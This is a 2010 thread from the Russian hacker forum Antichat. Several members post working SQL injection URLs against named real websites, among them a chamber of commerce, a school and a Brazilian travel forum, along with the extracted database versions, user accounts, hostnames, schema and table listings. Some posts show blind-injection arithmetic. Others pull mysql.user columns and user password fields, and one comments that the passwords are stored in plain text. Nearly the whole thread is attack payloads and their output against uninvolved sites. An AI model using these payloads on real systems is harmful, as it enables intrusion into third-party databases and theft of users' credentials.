ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.02.2010, 22:23
Аватар для $Atlet$
$Atlet$
Участник форума
Регистрация: 25.10.2008
Сообщений: 215
Провел на форуме:
2483773

Репутация: 78
Отправить сообщение для $Atlet$ с помощью ICQ
По умолчанию

Код:
http://www.cr.camcom.it/view.php?topic=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17+--+
Version: 4.1.19-max
User: cciaa
Database: cciaa
 
Ответить с цитированием

  #2  
Старый 24.02.2010, 04:26
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
http://www.kozactvo.org.ua/uk_u.php?d=a&i=-2165+union+select+1,2,3,4,5,6,7,8,version(),10,11, 12,13,14,15,16--+
Цитата:
http://www.wbdg.org/ccb/browse_doc.php?d=-5445+union+select+concat(version(),file_priv,user) ,2,3,4+from+mysql.user+where+user=0x6273615f666f72 756d--+
5.0.88-rsNbsa_forum

Последний раз редактировалось Strilo4ka; 24.02.2010 в 04:29..
 
Ответить с цитированием

  #3  
Старый 24.02.2010, 12:05
Аватар для nemaniak
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

shortcms.de

Код:
http://www.shortcms.de/printview.php?func=news1&pvid=-55%20union%20all%20select%201,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8--
Код:
5.0.81-log:dbo230238322@212.227.29.31:db230238322
firstsong.de

Код:
http://www.firstsong.de/kde/printview.php?func=news1&pvid=-55%20union%20select%201,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7--
Код:
5.0.32-Debian_7etch11-log:web9@localhost:usr_web9_1
 
Ответить с цитированием

  #4  
Старый 24.02.2010, 14:15
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Какой-то порнографический(или эротический) сайт мля... Пришлось аж картинки отключать, чтобы не видеть этого!!! Blind,запарился перебирать:
Код:
http://www.squirtz.com/model.html?id=-1+union+select+1,2,3,4,0,6,ascii(substring((select+version()),1,1)),8--
version: 5.0.7
user: root@localhost
database: networkCentral

Короче смысл какой: первый столбец - id модели. Я взял первый. Там отображается возраст, 31 год для первого id-шника.
7ой столбец - это сколько отнимается от возраста. Ну и надо считать(математика ёпт).
В результате того запроса, который я написал, возраст получается -22->22+31=53(ascii ёпт)->версия 5

Последний раз редактировалось Seravin; 24.02.2010 в 15:11..
 
Ответить с цитированием

  #5  
Старый 24.02.2010, 15:02
Аватар для Kverter
Kverter
Новичок
Регистрация: 08.10.2009
Сообщений: 7
Провел на форуме:
24928

Репутация: 2
По умолчанию

http://www.borkecast.ru/index.php?action=pages&sid=4&id=-1+Union+select+1,2,3,4,5,6,7,concat(version(),0x3a ,user(),0xa3,database()),9

5.0.51a-community:
borkecas_borkec0@localhost
borkecas_borke
 
Ответить с цитированием

  #6  
Старый 24.02.2010, 16:44
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Ещё раз выложу, если удалите, хоть напишите почему!

Код:
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15+--+
5.0.45:root@localhost:viajando_

Databases:
Код:
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.schemata+--+
information_schema,mysql,test,viajando_

Tables database(mysql)
Код:
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=0x6d7973716c+--+
columns_priv,db,func,help_category,help_keyword,he lp_relation,help_topic,host,proc,procs_priv,tables _priv,time_zone,time_zone_leap_second,time_zone_na me,time_zone_transition,time_zone_transition_type, user

Tables database(viajando_)
Код:
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=0x7669616a616e646f5f+--+
afiliados,ano,areas,atracoes,atracoes_avulsas,atra coes_comentarios,cadastro,cadastro_ano,cadastro_di a,cadastro_mes,chat,cidades,clubes,codigos_seguran ca,colunas,colunas_colaboradores,compras,compras_l ista,compras_lista_categorias,curiosidades,dia,dis ney_legends,dominio,empresas,encontros_gifts,enque te,enquete_opcao,estados,eventos_sazonais,forum_di cas,forum_informacoes,forum_online,forum_topicos,f orum_topicos_favoritos,fotos,fotos_exibicao,guestb ook,hiddenmickeys,horario,hoteis,hoteis_categorias ,hoteis_comentarios,images,ips_bloqueados,links,li nksrelacionados,lojas,materias,mes,noticias,online ,online_total,palavras,paradas,parques,parques_jar dins,passaporte,patrocinio,patrocinio_clicks,patro cinio_ingresso,patrocinio_ingresso_empresas,planej amento,planejamento_secoes,quotes,quotes_meta,refe icoes_personagens,reformas,rentacar_cars,rentacar_ categories,rentacar_companies,rentacar_promotions, rentacar_tables,restaurantes,restaurantes_comentar ios,shoppings,telefones,tours,users,users_notices, videos,visitas,visto

Columns(mysql.user)
Код:
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x75736572+--+
Host,User,Password,Select_priv,Insert_priv,Update_ priv,Delete_priv,Create_priv,Drop_priv,Reload_priv ,Shutdown_priv,Process_priv,File_priv,Grant_priv,R eferences_priv,Index_priv,Alter_priv,Show_db_priv, Super_priv,Create_tmp_table_priv,Lock_tables_priv, Execute_priv,Repl_slave_priv,Repl_client_priv,Crea te_view_priv,Show_view_priv,Create_routine_priv,Al ter_routine_priv,Create_user_priv,ssl_type,ssl_cip her,x509_issuer,x509_subject,max_questions,max_upd ates,max_connections,max_user_connections

Последний раз редактировалось Seravin; 24.02.2010 в 17:04..
 
Ответить с цитированием

  #7  
Старый 24.02.2010, 21:25
Аватар для Kverter
Kverter
Новичок
Регистрация: 08.10.2009
Сообщений: 7
Провел на форуме:
24928

Репутация: 2
По умолчанию

http://www.gimnazia70.spb.ru/index.php?id_page=-1+union+select+concat(version(),0x3a,user(),0x3a,d atabase()),2,3&db=yes

5.0.77-log:
gimnazia_school@jupiter.usedns.com:
gimnazia_school
 
Ответить с цитированием

  #8  
Старый 24.02.2010, 21:42
Аватар для Kverter
Kverter
Новичок
Регистрация: 08.10.2009
Сообщений: 7
Провел на форуме:
24928

Репутация: 2
По умолчанию

немного футбола))))
http://www.eurocups.ru/champs/table.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,d atabase()),2,3
 
Ответить с цитированием

  #9  
Старый 25.02.2010, 05:13
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

гы версия 4.1.22-standard-log 5
таблица users 57 колонок, пипец
Цитата:
http://www.eaea.org/index.php?k=4821&%20projekti_id=3378+AND%20(1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55, 56,57)%20=%20(SELECT%20*%20FROM%20users%20UNION%20 SELECT%201,2,3%0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57%20LIMIT%201)/*
Цитата:
http://www.eaea.org/index.php?k=4821&%20projekti_id=3378+union+select+ 1,2,3,4,5,group_concat(concat_ws(0x3a,version(),us er,password)),7,8,9,10,11,12,13,14,15,16+from+user s/*

Последний раз редактировалось Strilo4ka; 25.02.2010 в 11:17.. Причина: отступы!!!
 
Ответить с цитированием

  #10  
Старый 25.02.2010, 18:05
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://pinskdrevmebel.ru/novosti/item/otkrytie_novogo_sajta'+and+1=2)+UNION+SELECT+1,2,3,4,concat(database(),0x3a,user(),0x3a,version()),6,7,8,9,10,11,12,13+--+
pinskdre_loran: pinskdre@localhost: 5.0.87-community-log

Все пароли снова в открытом виде(
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ